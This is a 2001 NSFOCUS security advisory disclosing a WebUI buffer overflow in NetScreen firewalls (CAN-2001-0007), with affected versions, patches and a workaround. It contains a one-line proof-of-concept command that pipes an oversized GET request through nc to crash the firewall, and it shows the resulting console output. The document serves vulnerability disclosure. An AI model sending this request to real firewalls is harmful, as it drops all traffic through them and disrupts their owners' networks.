NSFOCUS Security Advisory(SA2001-01)

Topic: NetScreen Firewall WebUI Buffer Overflow vulnerability

Release DateЈє Jan 9th, 2001

CVE Candidate Numbers: CAN-2001-0007

Affected system:

ScreenOS release 1.73r1 on the NetScreen-1000
ScreenOS release 2.01r6 on the NetScreen-10/100
ScreenOS release 2.10r3 on the NetScreen-5
ScreenOS release 2.5r1 on the NetScreen-5/10/100

Non-affected systemЈє

ScreenOS release 1.73r2 on the NetScreen-1000
ScreenOS release 2.01r7 on the NetScreen-10/100
ScreenOS release 2.10r4 on the NetScreen-5
ScreenOS release 2.5r2 on the NetScreen-5/10/100

Impact:

NSFOCUS security team has found a buffer overflow vulnerability in
NetScreen Firewall WebUI. Exploitation of this vulnerability,
malicious user can launch remote DoS attack to crash the firewall.

DescriptionЈє

NetScreen Firewall is a popular commercial firewall. It has a Web
administration interface (default listening at port 80) that allows
firewall administrator to configure firewall with browser. However,
it is lack of length check-up of input URL. Provided with a oversized
URL request, a buffer overflow may take place that will crash the
NetScreen firewall. In that case, all connections through firewall
will be dropped, and the firewall won't response to any connection
request. Rebooting the firewall is required to regain its functions.

Attackers can launch attack without logining firewall.

All current versions of ScreeOS, including 1.73r1, 2.0r6, 2.1r3 and
2.5r1 are affected by this vulnerability on occasion that WebUI has
been enabled .

Exploit:

Once the input URL is longer than 1220 bytesЈ¬NetScreen firewall will
crash:

$echo -e "GET /perl -e 'print "A"x1220' HTTP/1.0\n\n"|nc netscreen_firewall
80

Following information will appear on firewall consoleЈє

****************************** EXCEPTION******************************

Bus error execption (data reference: load or store)

EPC = 0x8009AA1C, SR = 0x34501007, Cause = 0x0080001C

Firewall halts now.

Workaround:

Disable WebUI management or appoint trusted administration host before
acquirement and installation of relevant patch.

Vendor Status:

We have notified NetScreen of this vulnerability on 12/19/2000 .
On 12/26/2000 NetScreen has issued following ScreenOS release versions
to fix the bug:

ScreenOS 1.73r2 on the NetScreen-1000
ScreenOS 2.10r4 on the NetScreen-5
ScreenOS 2.01r7 on the NetScreen-10/100
ScreenOS 2.5.0r2 on the NetScreen-5/10/100

Latest software are available at:
http://www.netscreen.com/support/updates.html
You can also contact NetScreen Technical Support Center
(mailto:[email protected]) for upgraded software.

Additional Information:

The Common Vulnerabilities and Exposures (CVE) project has
assigned the name CAN-2001-0007 to this issue. This is a
candidate for inclusion in the CVE list (http://cve.mitre.org),
which standardizes names for security problems. Candidates
may change significantly before they become official CVE entries.

DISCLAIMS:

THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

?Copyright 1999-2000 NSFOCUS. All Rights Reserved. Terms of use.

NSFOCUS Security Team <[email protected]>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)